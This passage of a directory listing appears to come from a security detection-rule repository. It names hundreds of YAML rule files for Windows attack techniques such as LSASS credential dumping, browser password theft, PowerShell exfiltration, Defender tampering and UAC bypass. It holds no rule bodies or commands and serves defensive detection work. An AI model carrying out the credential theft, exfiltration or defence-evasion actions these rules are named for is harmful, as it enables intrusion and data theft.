possible_browser_pass_view_parameter.yml │ ├── possible_lateral_movement_powershell_spawn.yml │ ├── potential_password_in_username.yml │ ├── potential_system_network_configuration_discovery_activity.yml │ ├── potential_telegram_api_request_via_commandline.yml │ ├── potentially_malicious_code_on_commandline.yml │ ├── powershell_4104_hunting.yml │ ├── powershell___connect_to_internet_with_hidden_window.yml │ ├── powershell_com_hijacking_inprocserver32_modification.yml │ ├── powershell_creating_thread_mutex.yml │ ├── powershell_disable_security_monitoring.yml │ ├── powershell_domain_enumeration.yml │ ├── powershell_enable_powershell_remoting.yml │ ├── powershell_enable_smb1protocol_feature.yml │ ├── powershell_execute_com_object.yml │ ├── powershell_fileless_process_injection_via_getprocaddress.yml │ ├── powershell_fileless_script_contains_base64_encoded_content.yml │ ├── powershell_get_localgroup_discovery.yml │ ├── powershell_get_localgroup_discovery_with_script_block_logging.yml │ ├── powershell_invoke_cimmethod_cimsession.yml │ ├── powershell_invoke_wmiexec_usage.yml │ ├── powershell_load_module_in_meterpreter.yml │ ├── powershell_loading_dotnet_into_memory_via_reflection.yml │ ├── powershell_processing_stream_of_data.yml │ ├── powershell_remote_services_add_trustedhost.yml │ ├── powershell_remote_thread_to_known_windows_process.yml │ ├── powershell_remove_windows_defender_directory.yml │ ├── powershell_script_block_with_url_chain.yml │ ├── powershell_start_bitstransfer.yml │ ├── powershell_start_or_stop_service.yml │ ├── powershell_using_memory_as_backing_store.yml │ ├── powershell_webrequest_using_memory_stream.yml │ ├── powershell_windows_defender_exclusion_commands.yml │ ├── prevent_automatic_repair_mode_using_bcdedit.yml │ ├── print_processor_registry_autostart.yml │ ├── print_spooler_adding_a_printer_driver.yml │ ├── print_spooler_failed_to_load_a_plug_in.yml │ ├── process_creating_lnk_file_in_suspicious_location.yml │ ├── 
process_deleting_its_process_file_path.yml │ ├── process_execution_via_wmi.yml │ ├── process_kill_base_on_file_path.yml │ ├── process_writing_dynamicwrapperx.yml │ ├── processes_launching_netsh.yml │ ├── processes_tapping_keyboard_events.yml │ ├── randomly_generated_scheduled_task_name.yml │ ├── randomly_generated_windows_service_name.yml │ ├── ransomware_notes_bulk_creation.yml │ ├── recon_avproduct_through_pwh_or_wmi.yml │ ├── recon_using_wmi_class.yml │ ├── recursive_delete_of_directory_in_batch_cmd.yml │ ├── reg_exe_manipulating_windows_services_registry_keys.yml │ ├── registry_keys_for_creating_shim_databases.yml │ ├── registry_keys_used_for_persistence.yml │ ├── registry_keys_used_for_privilege_escalation.yml │ ├── regsvr32_silent_and_install_param_dll_loading.yml │ ├── regsvr32_with_known_silent_switch_cmdline.yml │ ├── remcos_client_registry_install_entry.yml │ ├── remcos_rat_file_creation_in_remcos_folder.yml │ ├── remote_desktop_process_running_on_system.yml │ ├── remote_process_instantiation_via_dcom_and_powershell.yml │ ├── remote_process_instantiation_via_dcom_and_powershell_script_block.yml │ ├── remote_process_instantiation_via_winrm_and_powershell.yml │ ├── remote_process_instantiation_via_winrm_and_powershell_script_block.yml │ ├── remote_process_instantiation_via_winrm_and_winrs.yml │ ├── remote_process_instantiation_via_wmi.yml │ ├── remote_process_instantiation_via_wmi_and_powershell.yml │ ├── remote_process_instantiation_via_wmi_and_powershell_script_block.yml │ ├── remote_system_discovery_with_adsisearcher.yml │ ├── remote_system_discovery_with_dsquery.yml │ ├── remote_system_discovery_with_wmic.yml │ ├── remote_wmi_command_attempt.yml │ ├── resize_shadowstorage_volume.yml │ ├── revil_common_exec_parameter.yml │ ├── revil_registry_entry.yml │ ├── rubeus_command_line_parameters.yml │ ├── rubeus_kerberos_ticket_exports_through_winlogon_access.yml │ ├── runas_execution_in_commandline.yml │ ├── rundll32_control_rundll_hunt.yml │ ├── 
rundll32_control_rundll_world_writable_directory.yml │ ├── rundll32_create_remote_thread_to_a_process.yml │ ├── rundll32_createremotethread_in_browser.yml │ ├── rundll32_lockworkstation.yml │ ├── rundll32_process_creating_exe_dll_files.yml │ ├── rundll32_shimcache_flush.yml │ ├── rundll32_with_no_command_line_arguments_with_network.yml │ ├── rundll_loading_dll_by_ordinal.yml │ ├── ryuk_test_files_detected.yml │ ├── ryuk_wake_on_lan_command.yml │ ├── sam_database_file_access_attempt.yml │ ├── samsam_test_file_write.yml │ ├── sc_exe_manipulating_windows_services.yml │ ├── schcache_change_by_app_connect_and_create_adsi_object.yml │ ├── schedule_task_with_http_command_arguments.yml │ ├── schedule_task_with_rundll32_command_trigger.yml │ ├── scheduled_task_creation_on_remote_endpoint_using_at.yml │ ├── scheduled_task_deleted_or_created_via_cmd.yml │ ├── scheduled_task_initiation_on_remote_endpoint.yml │ ├── schtasks_run_task_on_demand.yml │ ├── schtasks_scheduling_job_on_remote_system.yml │ ├── schtasks_used_for_forcing_a_reboot.yml │ ├── screensaver_event_trigger_execution.yml │ ├── script_execution_via_wmi.yml │ ├── sdclt_uac_bypass.yml │ ├── sdelete_application_execution.yml │ ├── searchprotocolhost_with_no_command_line_with_network.yml │ ├── secretdumps_offline_ntds_dumping_tool.yml │ ├── serviceprincipalnames_discovery_with_powershell.yml │ ├── serviceprincipalnames_discovery_with_setspn.yml │ ├── services_escalate_exe.yml │ ├── services_lolbas_execution_process_spawn.yml │ ├── set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml │ ├── shim_database_file_creation.yml │ ├── shim_database_installation_with_suspicious_parameters.yml │ ├── short_lived_scheduled_task.yml │ ├── short_lived_windows_accounts.yml │ ├── silentcleanup_uac_bypass.yml │ ├── single_letter_process_on_endpoint.yml │ ├── slui_runas_elevated.yml │ ├── slui_spawning_a_process.yml │ ├── spike_in_file_writes.yml │ ├── spoolsv_spawning_rundll32.yml │ ├── 
spoolsv_suspicious_loaded_modules.yml │ ├── spoolsv_suspicious_process_access.yml │ ├── spoolsv_writing_a_dll.yml │ ├── spoolsv_writing_a_dll___sysmon.yml │ ├── sqlite_module_in_temp_folder.yml │ ├── steal_or_forge_authentication_certificates_behavior_identified.yml │ ├── sunburst_correlation_dll_and_network_event.yml │ ├── suspicious_computer_account_name_change.yml │ ├── suspicious_copy_on_system32.yml │ ├── suspicious_curl_network_connection.yml │ ├── suspicious_dllhost_no_command_line_arguments.yml │ ├── suspicious_gpupdate_no_command_line_arguments.yml │ ├── suspicious_icedid_rundll32_cmdline.yml │ ├── suspicious_image_creation_in_appdata_folder.yml │ ├── suspicious_kerberos_service_ticket_request.yml │ ├── suspicious_linux_discovery_commands.yml │ ├── suspicious_microsoft_workflow_compiler_rename.yml │ ├── suspicious_microsoft_workflow_compiler_usage.yml │ ├── suspicious_msbuild_path.yml │ ├── suspicious_msbuild_rename.yml │ ├── suspicious_msbuild_spawn.yml │ ├── suspicious_mshta_child_process.yml │ ├── suspicious_mshta_spawn.yml │ ├── suspicious_plistbuddy_usage.yml │ ├── suspicious_plistbuddy_usage_via_osquery.yml │ ├── suspicious_process_executed_from_container_file.yml │ ├── suspicious_reg_exe_process.yml │ ├── suspicious_regsvr32_register_suspicious_path.yml │ ├── suspicious_rundll32_dllregisterserver.yml │ ├── suspicious_rundll32_no_command_line_arguments.yml │ ├── suspicious_rundll32_plugininit.yml │ ├── suspicious_rundll32_startw.yml │ ├── suspicious_scheduled_task_from_public_directory.yml │ ├── suspicious_searchprotocolhost_no_command_line_arguments.yml │ ├── suspicious_sqlite3_lsquarantine_behavior.yml │ ├── suspicious_ticket_granting_ticket_request.yml │ ├── suspicious_wav_file_in_appdata_folder.yml │ ├── suspicious_wevtutil_usage.yml │ ├── suspicious_writes_to_windows_recycle_bin.yml │ ├── svchost_lolbas_execution_process_spawn.yml │ ├── system_info_gathering_using_dxdiag_application.yml │ ├── system_information_discovery_detection.yml │ ├── 
system_processes_run_from_unexpected_locations.yml │ ├── system_user_discovery_with_query.yml │ ├── system_user_discovery_with_whoami.yml │ ├── time_provider_persistence_registry.yml │ ├── trickbot_named_pipe.yml │ ├── uac_bypass_mmc_load_unsigned_dll.yml │ ├── uac_bypass_with_colorui_com_object.yml │ ├── uninstall_app_using_msiexec.yml │ ├── unknown_process_using_the_kerberos_protocol.yml │ ├── unload_sysmon_filter_driver.yml │ ├── unloading_amsi_via_reflection.yml │ ├── unusual_number_of_computer_service_tickets_requested.yml │ ├── unusual_number_of_kerberos_service_tickets_requested.yml │ ├── unusual_number_of_remote_endpoint_authentication_events.yml │ ├── unusually_long_command_line.yml │ ├── unusually_long_command_line___mltk.yml │ ├── user_discovery_with_env_vars_powershell.yml │ ├── user_discovery_with_env_vars_powershell_script_block.yml │ ├── usn_journal_deletion.yml │ ├── vbscript_execution_using_wscript_app.yml │ ├── verclsid_clsid_execution.yml │ ├── w3wp_spawning_shell.yml │ ├── wbadmin_delete_system_backups.yml │ ├── wbemprox_com_object_execution.yml │ ├── web_servers_executing_suspicious_processes.yml │ ├── wermgr_process_create_executable_file.yml │ ├── wermgr_process_spawned_cmd_or_powershell_process.yml │ ├── wget_download_and_bash_execution.yml │ ├── windows_access_token_manipulation_sedebugprivilege.yml │ ├── windows_access_token_manipulation_winlogon_duplicate_token_handle.yml │ ├── windows_access_token_winlogon_duplicate_handle_in_uncommon_path.yml │ ├── windows_account_access_removal_via_logoff_exec.yml │ ├── windows_account_discovery_for_none_disable_user_account.yml │ ├── windows_account_discovery_for_sam_account_name.yml │ ├── windows_account_discovery_with_netuser_preauthnotrequire.yml │ ├── windows_ad_abnormal_object_access_activity.yml │ ├── windows_ad_add_self_to_group.yml │ ├── windows_ad_adminsdholder_acl_modified.yml │ ├── windows_ad_cross_domain_sid_history_addition.yml │ ├── windows_ad_dangerous_deny_acl_modification.yml │ ├── 
windows_ad_dangerous_group_acl_modification.yml │ ├── windows_ad_dangerous_user_acl_modification.yml │ ├── windows_ad_dcshadow_privileges_acl_addition.yml │ ├── windows_ad_domain_controller_audit_policy_disabled.yml │ ├── windows_ad_domain_controller_promotion.yml │ ├── windows_ad_domain_replication_acl_addition.yml │ ├── windows_ad_domain_root_acl_deletion.yml │ ├── windows_ad_domain_root_acl_modification.yml │ ├── windows_ad_dsrm_account_changes.yml │ ├── windows_ad_dsrm_password_reset.yml │ ├── windows_ad_gpo_deleted.yml │ ├── windows_ad_gpo_disabled.yml │ ├── windows_ad_gpo_new_cse_addition.yml │ ├── windows_ad_hidden_ou_creation.yml │ ├── windows_ad_object_owner_updated.yml │ ├── windows_ad_privileged_account_sid_history_addition.yml │ ├── windows_ad_privileged_group_modification.yml │ ├── windows_ad_privileged_object_access_activity.yml │ ├── windows_ad_replication_request_initiated_by_user_account.yml │ ├── windows_ad_replication_request_initiated_from_unsanctioned_location.yml │ ├── windows_ad_same_domain_sid_history_addition.yml │ ├── windows_ad_self_dacl_assignment.yml │ ├── windows_ad_serviceprincipalname_added_to_domain_account.yml │ ├── windows_ad_short_lived_domain_account_serviceprincipalname.yml │ ├── windows_ad_short_lived_domain_controller_spn_attribute.yml │ ├── windows_ad_short_lived_server_object.yml │ ├── windows_ad_sid_history_attribute_modified.yml │ ├── windows_ad_suspicious_attribute_modification.yml │ ├── windows_ad_suspicious_gpo_modification.yml │ ├── windows_adfind_exe.yml │ ├── windows_admin_permission_discovery.yml │ ├── windows_administrative_shares_accessed_on_multiple_hosts.yml │ ├── windows_admon_default_group_policy_object_modified.yml │ ├── windows_admon_group_policy_object_created.yml │ ├── windows_alternate_datastream___base64_content.yml │ ├── windows_alternate_datastream___executable_content.yml │ ├── windows_alternate_datastream___process_execution.yml │ ├── windows_anonymous_pipe_activity.yml │ ├── 
windows_apache_benchmark_binary.yml │ ├── windows_app_layer_protocol_qakbot_namedpipe.yml │ ├── windows_app_layer_protocol_wermgr_connect_to_namedpipe.yml │ ├── windows_application_layer_protocol_rms_radmin_tool_namedpipe.yml │ ├── windows_applocker_block_events.yml │ ├── windows_applocker_execution_from_uncommon_locations.yml │ ├── windows_applocker_privilege_escalation_via_unauthorized_bypass.yml │ ├── windows_applocker_rare_application_launch_detection.yml │ ├── windows_archive_collected_data_via_powershell.yml │ ├── windows_archive_collected_data_via_rar.yml │ ├── windows_archived_collected_data_in_temp_folder.yml │ ├── windows_attempt_to_stop_security_service.yml │ ├── windows_audit_policy_auditing_option_disabled_via_auditpol.yml │ ├── windows_audit_policy_auditing_option_modified___registry.yml │ ├── windows_audit_policy_cleared_via_auditpol.yml │ ├── windows_audit_policy_disabled_via_auditpol.yml │ ├── windows_audit_policy_disabled_via_legacy_auditpol.yml │ ├── windows_audit_policy_excluded_category_via_auditpol.yml │ ├── windows_audit_policy_restored_via_auditpol.yml │ ├── windows_audit_policy_security_descriptor_tampering_via_auditpol.yml │ ├── windows_autoit3_execution.yml │ ├── windows_autostart_execution_lsass_driver_registry_modification.yml │ ├── windows_binary_proxy_execution_mavinject_dll_injection.yml │ ├── windows_bitlocker_suspicious_command_usage.yml │ ├── windows_bitlockertogo_process_execution.yml │ ├── windows_bitlockertogo_with_network_activity.yml │ ├── windows_boot_or_logon_autostart_execution_in_startup_folder.yml │ ├── windows_bootloader_inventory.yml │ ├── windows_bypass_uac_via_pkgmgr_tool.yml │ ├── windows_cab_file_on_disk.yml │ ├── windows_cached_domain_credentials_reg_query.yml │ ├── windows_change_default_file_association_for_no_file_ext.yml │ ├── windows_cisco_secure_endpoint_related_service_stopped.yml │ ├── windows_cisco_secure_endpoint_stop_immunet_service_via_sfc.yml │ ├── 
windows_cisco_secure_endpoint_unblock_file_via_sfc.yml │ ├── windows_cisco_secure_endpoint_uninstall_immunet_service_via_sfc.yml │ ├── windows_clipboard_data_via_get_clipboard.yml │ ├── windows_cmdline_tool_execution_from_non_shell_process.yml │ ├── windows_com_hijacking_inprocserver32_modification.yml │ ├── windows_command_and_scripting_interpreter_hunting_path_traversal.yml │ ├── windows_command_and_scripting_interpreter_path_traversal_exec.yml │ ├── windows_command_shell_dcrat_forkbomb_payload.yml │ ├── windows_common_abused_cmd_shell_risk_behavior.yml │ ├── windows_compatibility_telemetry_suspicious_child_process.yml │ ├── windows_compatibility_telemetry_tampering_through_registry.yml │ ├── windows_computer_account_created_by_computer_account.yml │ ├── windows_computer_account_requesting_kerberos_ticket.yml │ ├── windows_computer_account_with_spn.yml │ ├── windows_conhost_with_headless_argument.yml │ ├── windows_consolehost_history_file_deletion.yml │ ├── windows_create_local_account.yml │ ├── windows_create_local_administrator_account_via_net.yml │ ├── windows_credential_access_from_browser_password_store.yml │ ├── windows_credential_dumping_lsass_memory_createdump.yml │ ├── windows_credentials_access_via_vaultcli_module.yml │ ├── windows_credentials_from_password_stores_chrome_copied_in_temp_dir.yml │ ├── windows_credentials_from_password_stores_chrome_extension_access.yml │ ├── windows_credentials_from_password_stores_chrome_localstate_access.yml │ ├── windows_credentials_from_password_stores_chrome_login_data_access.yml │ ├── windows_credentials_from_password_stores_creation.yml │ ├── windows_credentials_from_password_stores_deletion.yml │ ├── windows_credentials_from_password_stores_query.yml │ ├── windows_credentials_from_web_browsers_saved_in_temp_folder.yml │ ├── windows_credentials_in_registry_reg_query.yml │ ├── windows_curl_download_to_suspicious_path.yml │ ├── windows_curl_upload_to_remote_destination.yml │ ├── 
windows_data_destruction_recursive_exec_files_deletion.yml │ ├── windows_debugger_tool_execution.yml │ ├── windows_defacement_modify_transcodedwallpaper_file.yml │ ├── windows_default_group_policy_object_modified.yml │ ├── windows_default_group_policy_object_modified_with_gpme.yml │ ├── windows_defender_asr_audit_events.yml │ ├── windows_defender_asr_block_events.yml │ ├── windows_defender_asr_registry_modification.yml │ ├── windows_defender_asr_rule_disabled.yml │ ├── windows_defender_asr_rules_stacking.yml │ ├── windows_defender_exclusion_registry_entry.yml │ ├── windows_delete_or_modify_system_firewall.yml │ ├── windows_deleted_registry_by_a_non_critical_process_file_path.yml │ ├── windows_detect_network_scanner_behavior.yml │ ├── windows_disable_change_password_through_registry.yml │ ├── windows_disable_lock_workstation_feature_through_registry.yml │ ├── windows_disable_logoff_button_through_registry.yml │ ├── windows_disable_memory_crash_dump.yml │ ├── windows_disable_notification_center.yml │ ├── windows_disable_or_modify_tools_via_taskkill.yml │ ├── windows_disable_or_stop_browser_process.yml │ ├── windows_disable_shutdown_button_through_registry.yml │ ├── windows_disable_windows_event_logging_disable_http_logging.yml │ ├── windows_disable_windows_group_policy_features_through_registry.yml │ ├── windows_disableantispyware_registry.yml │ ├── windows_diskcryptor_usage.yml │ ├── windows_diskshadow_proxy_execution.yml │ ├── windows_dism_install_powershell_web_access.yml │ ├── windows_dism_remove_defender.yml │ ├── windows_dll_search_order_hijacking_hunt_with_sysmon.yml │ ├── windows_dll_search_order_hijacking_with_iscsicpl.yml │ ├── windows_dll_side_loading_in_calc.yml │ ├── windows_dll_side_loading_process_child_of_calc.yml │ ├── windows_dns_gather_network_info.yml │ ├── windows_dnsadmins_new_member_added.yml │ ├── windows_domain_account_discovery_via_get_netcomputer.yml │ ├── windows_domain_admin_impersonation_indicator.yml │ ├── 
windows_dotnet_binary_in_non_standard_path.yml │ ├── windows_driver_inventory.yml │ ├── windows_driver_load_non_standard_path.yml │ ├── windows_drivers_loaded_by_signature.yml │ ├── windows_enable_powershell_web_access.yml │ ├── windows_enable_win32_scheduledjob_via_registry.yml │ ├── windows_esx_admins_group_creation_security_event.yml │ ├── windows_esx_admins_group_creation_via_net.yml │ ├── windows_esx_admins_group_creation_via_powershell.yml │ ├── windows_event_for_service_disabled.yml │ ├── windows_event_log_cleared.yml │ ├── windows_event_logging_service_has_shutdown.yml │ ├── windows_event_triggered_image_file_execution_options_injection.yml │ ├── windows_eventlog_cleared_via_wevtutil.yml │ ├── windows_eventlog_recon_activity_using_log_query_utilities.yml │ ├── windows_excessive_disabled_services_event.yml │ ├── windows_excessive_service_stop_attempt.yml │ ├── windows_excessive_usage_of_net_app.yml │ ├── windows_executable_in_loaded_modules.yml │ ├── windows_execute_arbitrary_commands_with_msdt.yml │ ├── windows_exfiltration_over_c2_via_invoke_restmethod.yml │ ├── windows_exfiltration_over_c2_via_powershell_uploadstring.yml │ ├── windows_explorer_exe_spawning_powershell_or_cmd.yml │ ├── windows_explorer_lnk_exploit_process_launch_with_padding.yml │ ├── windows_export_certificate.yml │ ├── windows_file_and_directory_enable_readonly_permissions.yml │ ├── windows_file_and_directory_permissions_enable_inheritance.yml │ ├── windows_file_and_directory_permissions_remove_inheritance.yml │ ├── windows_file_download_via_certutil.yml │ ├── windows_file_share_discovery_with_powerview.yml │ ├── windows_file_transfer_protocol_in_non_common_process_path.yml │ ├── windows_file_without_extension_in_critical_folder.yml │ ├── windows_files_and_dirs_access_rights_modification_via_icacls.yml │ ├── windows_find_domain_organizational_units_with_getdomainou.yml │ ├── windows_find_interesting_acl_with_findinterestingdomainacl.yml │ ├── windows_findstr_gpp_discovery.yml │ ├── 
windows_firewall_rule_added.yml │ ├── windows_firewall_rule_deletion.yml │ ├── windows_firewall_rule_modification.yml │ ├── windows_forest_discovery_with_getforestdomain.yml │ ├── windows_gather_victim_host_information_camera.yml │ ├── windows_gather_victim_identity_sam_info.yml │ ├── windows_get_adcomputer_unconstrained_delegation_discovery.yml │ ├── windows_get_local_admin_with_findlocaladminaccess.yml │ ├── windows_global_object_access_audit_list_cleared_via_auditpol.yml │ ├── windows_group_discovery_via_net.yml │ ├── windows_group_policy_object_created.yml │ ├── windows_hidden_schedule_task_settings.yml │ ├── windows_hide_notification_features_through_registry.yml │ ├── windows_high_file_deletion_frequency.yml │ ├── windows_hijack_execution_flow_version_dll_side_load.yml │ ├── windows_http_network_communication_from_msiexec.yml │ ├── windows_hunting_system_account_targeting_lsass.yml │ ├── windows_identify_powershell_web_access_iis_pool.yml │ ├── windows_identify_protocol_handlers.yml │ ├── windows_iis_components_add_new_module.yml │ ├── windows_iis_components_get_webglobalmodule_module_query.yml │ ├── windows_iis_components_module_failed_to_load.yml │ ├── windows_iis_components_new_module_added.yml │ ├── windows_impair_defense_add_xml_applocker_rules.yml │ ├── windows_impair_defense_change_win_defender_health_check_intervals.yml │ ├── windows_impair_defense_change_win_defender_quick_scan_interval.yml │ ├── windows_impair_defense_change_win_defender_throttle_rate.yml │ ├── windows_impair_defense_change_win_defender_tracing_level.yml │ ├── windows_impair_defense_configure_app_install_control.yml │ ├── windows_impair_defense_define_win_defender_threat_action.yml │ ├── windows_impair_defense_delete_win_defender_context_menu.yml │ ├── windows_impair_defense_delete_win_defender_profile_registry.yml │ ├── windows_impair_defense_deny_security_software_with_applocker.yml │ ├── windows_impair_defense_disable_controlled_folder_access.yml │ ├── 
windows_impair_defense_disable_defender_firewall_and_network.yml │ ├── windows_impair_defense_disable_defender_protocol_recognition.yml │ ├── windows_impair_defense_disable_pua_protection.yml │ ├── windows_impair_defense_disable_realtime_signature_delivery.yml │ ├── windows_impair_defense_disable_web_evaluation.yml │ ├── windows_impair_defense_disable_win_defender_app_guard.yml │ ├── windows_impair_defense_disable_win_defender_compute_file_hashes.yml │ ├── windows_impair_defense_disable_win_defender_gen_reports.yml │ ├── windows_impair_defense_disable_win_defender_network_protection.yml │ ├── windows_impair_defense_disable_win_defender_report_infection.yml │ ├── windows_impair_defense_disable_win_defender_scan_on_update.yml │ ├── windows_impair_defense_disable_win_defender_signature_retirement.yml │ ├── windows_impair_defense_overide_win_defender_phishing_filter.yml │ ├── windows_impair_defense_override_smartscreen_prompt.yml │ ├── windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml │ ├── windows_impair_defenses_disable_auto_logger_session.yml │ ├── windows_impair_defenses_disable_av_autostart_via_registry.yml │ ├── windows_impair_defenses_disable_hvci.yml │ ├── windows_impair_defenses_disable_win_defender_auto_logging.yml │ ├── windows_important_audit_policy_disabled.yml │ ├── windows_increase_in_group_or_object_modification_activity.yml │ ├── windows_increase_in_user_modification_activity.yml │ ├── windows_indicator_removal_via_rmdir.yml │ ├── windows_indirect_command_execution_via_forfiles.yml │ ├── windows_indirect_command_execution_via_pcalua.yml │ ├── windows_indirect_command_execution_via_series_of_forfiles.yml │ ├── windows_information_discovery_fsutil.yml │ ├── windows_ingress_tool_transfer_using_explorer.yml │ ├── windows_inprocserver32_new_outlook_form.yml │ ├── windows_input_capture_using_credential_ui_dll.yml │ ├── windows_installutil_credential_theft.yml │ ├── windows_installutil_in_non_standard_path.yml │ ├── 
windows_installutil_remote_network_connection.yml │ ├── windows_installutil_uninstall_option.yml │ ├── windows_installutil_uninstall_option_with_network.yml │ ├── windows_installutil_url_in_command_line.yml │ ├── windows_iso_lnk_file_creation.yml │ ├── windows_java_spawning_shells.yml │ ├── windows_kerberos_local_successful_logon.yml │ ├── windows_known_abused_dll_created.yml │ ├── windows_known_abused_dll_loaded_suspiciously.yml │ ├── windows_known_graphicalproton_loaded_modules.yml │ ├── windows_krbrelayup_service_creation.yml │ ├── windows_large_number_of_computer_service_tickets_requested.yml │ ├── windows_ldifde_directory_object_behavior.yml │ ├── windows_linked_policies_in_adsi_discovery.yml │ ├── windows_list_env_variables_via_set_command_from_uncommon_parent.yml │ ├── windows_local_administrator_credential_stuffing.yml │ ├── windows_lolbas_executed_as_renamed_file.yml │ ├── windows_lolbas_executed_outside_expected_path.yml │ ├── windows_lsa_secrets_nolmhash_registry.yml │ ├── windows_mail_protocol_in_non_common_process_path.yml │ ├── windows_mark_of_the_web_bypass.yml │ ├── windows_masquerading_explorer_as_child_process.yml │ ├── windows_masquerading_msdtc_process.yml │ ├── windows_mimikatz_binary_execution.yml │ ├── windows_mimikatz_crypto_export_file_extensions.yml │ ├── windows_modify_registry_authenticationleveloverride.yml │ ├── windows_modify_registry_auto_minor_updates.yml │ ├── windows_modify_registry_auto_update_notif.yml │ ├── windows_modify_registry_configure_bitlocker.yml │ ├── windows_modify_registry_default_icon_setting.yml │ ├── windows_modify_registry_delete_firewall_rules.yml │ ├── windows_modify_registry_disable_rdp.yml │ ├── windows_modify_registry_disable_restricted_admin.yml │ ├── windows_modify_registry_disable_toast_notifications.yml │ ├── windows_modify_registry_disable_win_defender_raw_write_notif.yml │ ├── windows_modify_registry_disable_windefender_notifications.yml │ ├── 
windows_modify_registry_disable_windows_security_center_notif.yml │ ├── windows_modify_registry_disableremotedesktopantialias.yml │ ├── windows_modify_registry_disablesecuritysettings.yml │ ├── windows_modify_registry_disabling_wer_settings.yml │ ├── windows_modify_registry_disallow_windows_app.yml │ ├── windows_modify_registry_do_not_connect_to_win_update.yml │ ├── windows_modify_registry_dontshowui.yml │ ├── windows_modify_registry_enablelinkedconnections.yml │ ├── windows_modify_registry_longpathsenabled.yml │ ├── windows_modify_registry_maxconnectionperserver.yml │ ├── windows_modify_registry_no_auto_reboot_with_logon_user.yml │ ├── windows_modify_registry_no_auto_update.yml │ ├── windows_modify_registry_nochangingwallpaper.yml │ ├── windows_modify_registry_on_smart_card_group_policy.yml │ ├── windows_modify_registry_proxyenable.yml │ ├── windows_modify_registry_proxyserver.yml │ ├── windows_modify_registry_qakbot_binary_data_registry.yml │ ├── windows_modify_registry_regedit_silent_reg_import.yml │ ├── windows_modify_registry_risk_behavior.yml │ ├── windows_modify_registry_suppress_win_defender_notif.yml │ ├── windows_modify_registry_tamper_protection.yml │ ├── windows_modify_registry_to_add_or_modify_firewall_rule.yml │ ├── windows_modify_registry_updateserviceurlalternate.yml │ ├── windows_modify_registry_usewuserver.yml │ ├── windows_modify_registry_utilize_progids.yml │ ├── windows_modify_registry_valleyrat_c2_config.yml │ ├── windows_modify_registry_valleyrat_pwn_reg_entry.yml │ ├── windows_modify_registry_with_md5_reg_key_name.yml │ ├── windows_modify_registry_wuserver.yml │ ├── windows_modify_registry_wustatusserver.yml │ ├── windows_modify_show_compress_color_and_info_tip_registry.yml │ ├── windows_modify_system_firewall_with_notable_process_path.yml │ ├── windows_mof_event_triggered_execution_via_wmi.yml │ ├── windows_moveit_transfer_writing_aspx.yml │ ├── windows_msc_eviltwin_directory_path_manipulation.yml │ ├── 
windows_msexchange_management_mailbox_cmdlet_usage.yml │ ├── windows_mshta_execution_in_registry.yml │ ├── windows_mshta_writing_to_world_writable_path.yml │ ├── windows_msiexec_dllregisterserver.yml │ ├── windows_msiexec_hidewindow_rundll32_execution.yml │ ├── windows_msiexec_remote_download.yml │ ├── windows_msiexec_spawn_discovery_command.yml │ ├── windows_msiexec_spawn_windbg.yml │ ├── windows_msiexec_unregister_dllregisterserver.yml │ ├── windows_mstsc_rdp_commandline.yml │ ├── windows_multiple_account_passwords_changed.yml │ ├── windows_multiple_accounts_deleted.yml │ ├── windows_multiple_accounts_disabled.yml │ ├── windows_multiple_disabled_users_failed_to_authenticate_wth_kerberos.yml │ ├── windows_multiple_invalid_users_fail_to_authenticate_using_kerberos.yml │ ├── windows_multiple_invalid_users_failed_to_authenticate_using_ntlm.yml │ ├── windows_multiple_ntlm_null_domain_authentications.yml │ ├── windows_multiple_users_fail_to_authenticate_wth_explicitcredentials.yml │ ├── windows_multiple_users_failed_to_authenticate_from_host_using_ntlm.yml │ ├── windows_multiple_users_failed_to_authenticate_from_process.yml │ ├── windows_multiple_users_failed_to_authenticate_using_kerberos.yml │ ├── windows_multiple_users_remotely_failed_to_authenticate_from_host.yml │ ├── windows_network_connection_discovery_via_net.yml │ ├── windows_network_share_interaction_via_net.yml │ ├── windows_new_custom_security_descriptor_set_on_eventlog_channel.yml │ ├── windows_new_default_file_association_value_set.yml │ ├── windows_new_deny_permission_set_on_service_sd_via_sc_exe.yml │ ├── windows_new_eventlog_channelaccess_registry_value_set.yml │ ├── windows_new_inprocserver32_added.yml │ ├── windows_new_service_security_descriptor_set_via_sc_exe.yml │ ├── windows_ngrok_reverse_proxy_usage.yml │ ├── windows_nirsoft_advancedrun.yml │ ├── windows_nirsoft_utilities.yml │ ├── windows_njrat_fileless_storage_via_registry.yml │ ├── windows_non_discord_app_access_discord_leveldb.yml │ ├── 
windows_non_system_account_targeting_lsass.yml │ ├── windows_obfuscated_files_or_information_via_rar_sfx.yml │ ├── windows_odbcconf_hunting.yml │ ├── windows_odbcconf_load_dll.yml │ ├── windows_odbcconf_load_response_file.yml │ ├── windows_office_product_dropped_cab_or_inf_file.yml │ ├── windows_office_product_dropped_uncommon_file.yml │ ├── windows_office_product_loaded_mshtml_module.yml │ ├── windows_office_product_loading_taskschd_dll.yml │ ├── windows_office_product_loading_vbe7_dll.yml │ ├── windows_office_product_spawned_child_process_for_download.yml │ ├── windows_office_product_spawned_control.yml │ ├── windows_office_product_spawned_msdt.yml │ ├── windows_office_product_spawned_rundll32_with_no_dll.yml │ ├── windows_office_product_spawned_uncommon_process.yml │ ├── windows_outlook_webview_registry_modification.yml │ ├── windows_papercut_ng_spawn_shell.yml │ ├── windows_parent_pid_spoofing_with_explorer.yml │ ├── windows_password_managers_discovery.yml │ ├── windows_password_policy_discovery_with_net.yml │ ├── windows_phishing_outlook_drop_dll_in_form_dir.yml │ ├── windows_phishing_pdf_file_executes_url_link.yml │ ├── windows_phishing_recent_iso_exec_registry.yml │ ├── windows_possible_credential_dumping.yml │ ├── windows_post_exploitation_risk_behavior.yml │ ├── windows_powershell_add_module_to_global_assembly_cache.yml │ ├── windows_powershell_cryptography_namespace.yml │ ├── windows_powershell_disable_http_logging.yml │ ├── windows_powershell_export_certificate.yml │ ├── windows_powershell_export_pfxcertificate.yml │ ├── windows_powershell_fakecaptcha_clipboard_execution.yml │ ├── windows_powershell_get_ciminstance_remote_computer.yml │ ├── windows_powershell_history_file_deletion.yml │ ├── windows_powershell_iis_components_webglobalmodule_usage.yml │ ├── windows_powershell_import_applocker_policy.yml │ ├── windows_powershell_invoke_restmethod_ip_information_collection.yml │ ├── windows_powershell_invoke_sqlcmd_execution.yml │ ├── 
